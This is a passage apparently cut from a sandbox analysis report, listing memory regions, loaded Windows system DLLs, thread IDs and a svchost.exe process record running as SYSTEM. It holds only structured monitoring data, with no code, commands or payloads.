filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 1153
start_va = 0x7fefd180000
end_va = 0x7fefd1c6fff
entry_point = 0x7fefd180000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1154
start_va = 0x7fefd270000
end_va = 0x7fefd29ffff
entry_point = 0x7fefd270000
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 1155
start_va = 0x7fefd2a0000
end_va = 0x7fefd2fafff
entry_point = 0x7fefd2a0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1156
start_va = 0x7fefd410000
end_va = 0x7fefd416fff
entry_point = 0x7fefd410000
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 1157
start_va = 0x7fefd420000
end_va = 0x7fefd474fff
entry_point = 0x7fefd420000
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1158
start_va = 0x7fefd480000
end_va = 0x7fefd496fff
entry_point = 0x7fefd480000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1159
start_va = 0x7fefd720000
end_va = 0x7fefd733fff
entry_point = 0x7fefd720000
region_type = mapped_file
name = "cryptdll.dll"
filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll")
Region:
id = 1160
start_va = 0x7fefda20000
end_va = 0x7fefda2afff
entry_point = 0x7fefda20000
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 1161
start_va = 0x7fefda50000
end_va = 0x7fefda74fff
entry_point = 0x7fefda50000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1162
start_va = 0x7fefda80000
end_va = 0x7fefda8efff
entry_point = 0x7fefda80000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1163
start_va = 0x7fefda90000
end_va = 0x7fefdb20fff
entry_point = 0x7fefda90000
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 1164
start_va = 0x7fefdb70000
end_va = 0x7fefdb83fff
entry_point = 0x7fefdb70000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1165
start_va = 0x7fefdb90000
end_va = 0x7fefdb9efff
entry_point = 0x7fefdb90000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1166
start_va = 0x7fefdc30000
end_va = 0x7fefdc3efff
entry_point = 0x7fefdc30000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1167
start_va = 0x7fefdd60000
end_va = 0x7fefddcafff
entry_point = 0x7fefdd60000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1168
start_va = 0x7fefddf0000
end_va = 0x7fefdf56fff
entry_point = 0x7fefddf0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1169
start_va = 0x7fefdf60000
end_va = 0x7fefdfc6fff
entry_point = 0x7fefdf60000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1170
start_va = 0x7fefdfd0000
end_va = 0x7fefed57fff
entry_point = 0x7fefdfd0000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1171
start_va = 0x7fefed60000
end_va = 0x7fefed8dfff
entry_point = 0x7fefed60000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1172
start_va = 0x7fefee30000
end_va = 0x7fefee7cfff
entry_point = 0x7fefee30000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1173
start_va = 0x7fefee80000
end_va = 0x7feff0d8fff
entry_point = 0x7fefee80000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 1174
start_va = 0x7feff0e0000
end_va = 0x7feff1bafff
entry_point = 0x7feff0e0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1175
start_va = 0x7feff1c0000
end_va = 0x7feff1defff
entry_point = 0x7feff1c0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1176
start_va = 0x7feff1e0000
end_va = 0x7feff2e8fff
entry_point = 0x7feff1e0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1177
start_va = 0x7feff4d0000
end_va = 0x7feff598fff
entry_point = 0x7feff4d0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1178
start_va = 0x7feff5a0000
end_va = 0x7feff63efff
entry_point = 0x7feff5a0000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1179
start_va = 0x7feff640000
end_va = 0x7feff6b0fff
entry_point = 0x7feff640000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1180
start_va = 0x7feff6e0000
end_va = 0x7feff857fff
entry_point = 0x7feff6e0000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 1181
start_va = 0x7feff860000
end_va = 0x7feff86dfff
entry_point = 0x7feff860000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1182
start_va = 0x7feff870000
end_va = 0x7feff999fff
entry_point = 0x7feff870000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 1183
start_va = 0x7feff9a0000
end_va = 0x7feffa38fff
entry_point = 0x7feff9a0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1184
start_va = 0x7feffa40000
end_va = 0x7feffc42fff
entry_point = 0x7feffa40000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1185
start_va = 0x7feffc50000
end_va = 0x7feffd7cfff
entry_point = 0x7feffc50000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1186
start_va = 0x7feffd80000
end_va = 0x7feffe56fff
entry_point = 0x7feffd80000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1187
start_va = 0x7feffec0000
end_va = 0x7feffec7fff
entry_point = 0x7feffec0000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1188
start_va = 0x7fefff60000
end_va = 0x7fefff60fff
entry_point = 0x7fefff60000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1189
start_va = 0x7fffff7e000
end_va = 0x7fffff7ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7e000"
filename = ""
Region:
id = 1190
start_va = 0x7fffff80000
end_va = 0x7fffff81fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff80000"
filename = ""
Region:
id = 1191
start_va = 0x7fffff82000
end_va = 0x7fffff83fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff82000"
filename = ""
Region:
id = 1192
start_va = 0x7fffff84000
end_va = 0x7fffff85fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff84000"
filename = ""
Region:
id = 1193
start_va = 0x7fffff86000
end_va = 0x7fffff87fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff86000"
filename = ""
Region:
id = 1194
start_va = 0x7fffff8a000
end_va = 0x7fffff8bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8a000"
filename = ""
Region:
id = 1195
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 1196
start_va = 0x7fffff8e000
end_va = 0x7fffff8ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8e000"
filename = ""
Region:
id = 1197
start_va = 0x7fffff90000
end_va = 0x7fffff91fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff90000"
filename = ""
Region:
id = 1198
start_va = 0x7fffff92000
end_va = 0x7fffff93fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff92000"
filename = ""
Region:
id = 1199
start_va = 0x7fffff94000
end_va = 0x7fffff95fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff94000"
filename = ""
Region:
id = 1200
start_va = 0x7fffff96000
end_va = 0x7fffff97fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff96000"
filename = ""
Region:
id = 1201
start_va = 0x7fffff98000
end_va = 0x7fffff99fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff98000"
filename = ""
Region:
id = 1202
start_va = 0x7fffff9a000
end_va = 0x7fffff9bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9a000"
filename = ""
Region:
id = 1203
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 1204
start_va = 0x7fffff9e000
end_va = 0x7fffff9ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9e000"
filename = ""
Region:
id = 1205
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 1206
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 1207
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 1208
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 1209
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 1210
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 1211
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 1212
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 1213
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1214
start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 1215
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 1216
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 1217
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 1218
start_va = 0x7fffffdc000
end_va = 0x7fffffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 1219
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2085
start_va = 0x2a80000
end_va = 0x2afffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a80000"
filename = ""
Region:
id = 2086
start_va = 0x7fee2da0000
end_va = 0x7fee2db3fff
entry_point = 0x7fee2da0000
region_type = mapped_file
name = "fthsvc.dll"
filename = "\\Windows\\System32\\fthsvc.dll" (normalized: "c:\\windows\\system32\\fthsvc.dll")
Region:
id = 2087
start_va = 0x7fefb340000
end_va = 0x7fefb396fff
entry_point = 0x7fefb340000
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 2088
start_va = 0x7fefd6b0000
end_va = 0x7fefd71cfff
entry_point = 0x7fefd6b0000
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Thread:
id = 81
os_tid = 0xb8c
Thread:
id = 82
os_tid = 0xb88
Thread:
id = 83
os_tid = 0xb84
Thread:
id = 84
os_tid = 0xb80
Thread:
id = 85
os_tid = 0xb7c
Thread:
id = 86
os_tid = 0xafc
Thread:
id = 87
os_tid = 0xaf0
Thread:
id = 88
os_tid = 0xae8
Thread:
id = 89
os_tid = 0xaac
Thread:
id = 90
os_tid = 0xa88
Thread:
id = 91
os_tid = 0xa4c
Thread:
id = 92
os_tid = 0x9c4
Thread:
id = 93
os_tid = 0x998
Thread:
id = 94
os_tid = 0x98c
Thread:
id = 95
os_tid = 0x860
Thread:
id = 96
os_tid = 0xc0
Thread:
id = 97
os_tid = 0x368
Thread:
id = 98
os_tid = 0x458
Thread:
id = 99
os_tid = 0x424
Thread:
id = 100
os_tid = 0x414
Thread:
id = 101
os_tid = 0x7cc
Thread:
id = 102
os_tid = 0x7b4
Thread:
id = 103
os_tid = 0x7a8
Thread:
id = 104
os_tid = 0x7a4
Thread:
id = 105
os_tid = 0x6c8
Thread:
id = 106
os_tid = 0x174
Thread:
id = 107
os_tid = 0x178
Thread:
id = 108
os_tid = 0x130
Thread:
id = 109
os_tid = 0x118
Thread:
id = 156
os_tid = 0x8b0
Thread:
id = 187
os_tid = 0x250
Thread:
id = 188
os_tid = 0x48c
Thread:
id = 354
os_tid = 0x860
Thread:
id = 355
os_tid = 0xae8
Thread:
id = 356
os_tid = 0x978
Thread:
id = 357
os_tid = 0xb24
Thread:
id = 360
os_tid = 0x984
Thread:
id = 361
os_tid = 0xb14
Process:
id = "6"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x745e000"
os_pid = "0x36c"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "rpc_server"
parent_id = "4"
os_parent_pid = "0xbf0"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d435" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 1252
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1253
start_va = 0x20000
end_va = 0x26fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1254
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1255
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1256
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1257
start_va = 0xc0000
end_va = 0xc1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 1258
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 1259
start_va = 0xe0000
end_va = 0xe0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1260
start_va = 0xf0000
end_va = 0xf0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 1261
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 1262
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000110000"
filename = ""
Region:
id = 1263
start_va = 0x120000
end_va = 0x120fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000120000"
filename = ""
Region:
id = 1264
start_va = 0x130000
end_va = 0x131fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 1265
start_va = 0x140000
end_va = 0x143fff
entry_point = 0x140000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1266
start_va = 0x150000
end_va = 0x15ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 1267
start_va = 0x160000
end_va = 0x161fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 1268
start_va = 0x170000
end_va = 0x19ffff
entry_point = 0x170000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db")
Region:
id = 1269
start_va = 0x1a0000
end_va = 0x1a3fff
entry_point = 0x1a0000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1270
start_va = 0x1b0000
end_va = 0x1b0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 1271
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001c0000"
filename = ""
Region:
id = 1272
start_va = 0x1d0000
end_va = 0x24ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1273
start_va = 0x250000
end_va = 0x34ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 1274
start_va = 0x350000
end_va = 0x3b5fff
entry_point = 0x350000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 1275
start_va = 0x3c0000
end_va = 0x4bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000003c0000"
filename = ""
Region:
id = 1276
start_va = 0x4c0000
end_va = 0x647fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 1277
start_va = 0x650000
end_va = 0x7d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000650000"
filename = ""
Region:
id = 1278
start_va = 0x7e0000
end_va = 0x89ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007e0000"
filename = ""
Region:
id = 1279
start_va = 0x8a0000
end_va = 0xc92fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008a0000"
filename = ""
Region:
id = 1280
start_va = 0xca0000
end_va = 0xcbbfff
entry_point = 0xca0000
region_type = mapped_file
name = "firewallapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui")
Region:
id = 1281
start_va = 0xcc0000
end_va = 0xd3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000cc0000"
filename = ""
Region:
id = 1282
start_va = 0xd40000
end_va = 0xdbffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000d40000"
filename = ""
Region:
id = 1283
start_va = 0xdc0000
end_va = 0xdc0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000dc0000"
filename = ""
Region:
id = 1284
start_va = 0xdf0000
end_va = 0xdfffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000df0000"
filename = ""
Region:
id = 1285
start_va = 0xe40000
end_va = 0xebffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e40000"
filename = ""
Region:
id = 1286
start_va = 0xed0000
end_va = 0xf4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ed0000"
filename = ""
Region:
id = 1287
start_va = 0xf50000
end_va = 0xfcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f50000"
filename = ""
Region:
id = 1288
start_va = 0x1010000
end_va = 0x101ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001010000"
filename = ""
Region:
id = 1289
start_va = 0x1060000
end_va = 0x10dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001060000"
filename = ""
Region:
id = 1290
start_va = 0x10e0000
end_va = 0x13aefff
entry_point = 0x10e0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1291
start_va = 0x13d0000
end_va = 0x144ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000013d0000"
filename = ""
Region:
id = 1292
start_va = 0x1450000
end_va = 0x14cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001450000"
filename = ""
Region:
id = 1293
start_va = 0x1520000
end_va = 0x159ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001520000"
filename = ""
Region:
id = 1294
start_va = 0x15a0000
end_va = 0x161ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000015a0000"
filename = ""
Region:
id = 1295
start_va = 0x1620000
end_va = 0x169ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001620000"
filename = ""
Region:
id = 1296
start_va = 0x16e0000
end_va = 0x175ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000016e0000"
filename = ""
Region:
id = 1297
start_va = 0x1760000
end_va = 0x17dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001760000"
filename = ""
Region:
id = 1298
start_va = 0x1810000
end_va = 0x188ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001810000"
filename = ""
Region:
id = 1299
start_va = 0x1890000
end_va = 0x190ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001890000"
filename = ""
Region:
id = 1300
start_va = 0x1940000
end_va = 0x19bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001940000"
filename = ""
Region:
id = 1301
start_va = 0x19e0000
end_va = 0x1a5ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000019e0000"
filename = ""
Region:
id = 1302
start_va = 0x1a60000
end_va = 0x1adffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001a60000"
filename = ""
Region:
id = 1303
start_va = 0x1b00000
end_va = 0x1b7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001b00000"
filename = ""
Region:
id = 1304
start_va = 0x1b90000
end_va = 0x1c0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001b90000"
filename = ""
Region:
id = 1305
start_va = 0x1c60000
end_va = 0x1cdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001c60000"
filename = ""
Region:
id = 1306
start_va = 0x1d40000
end_va = 0x1dbffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001d40000"
filename = ""
Region:
id = 1307
start_va = 0x1e20000
end_va = 0x1e9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001e20000"
filename = ""
Region:
id = 1308
start_va = 0x1ea0000
end_va = 0x1f9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ea0000"
filename = ""
Region:
id = 1309
start_va = 0x1fa0000
end_va = 0x201ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001fa0000"
filename = ""
Region:
id = 1310
start_va = 0x2020000
end_va = 0x2362fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002020000"
filename = ""
Region:
id = 1311
start_va = 0x2370000
end_va = 0x246ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002370000"
filename = ""
Region:
id = 1312
start_va = 0x2550000
end_va = 0x25cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002550000"
filename = ""
Region:
id = 1313
start_va = 0x2630000
end_va = 0x26affff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 1314
start_va = 0x2770000
end_va = 0x27effff
entry_point = 0x0
region_type = private
name = "private_0x0000000002770000"
filename = ""
Region:
id = 1315
start_va = 0x2810000
end_va = 0x288ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 1316
start_va = 0x28e0000
end_va = 0x295ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000028e0000"
filename = ""
Region:
id = 1317
start_va = 0x2960000
end_va = 0x2a5ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002960000"
filename = ""
Region:
id = 1318
start_va = 0x2a90000
end_va = 0x2b0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a90000"
filename = ""
Region:
id = 1319
start_va = 0x2bd0000
end_va = 0x2c4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002bd0000"
filename = ""
Region:
id = 1320
start_va = 0x2c50000
end_va = 0x2d4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c50000"
filename = ""
Region:
id = 1321
start_va = 0x2dd0000
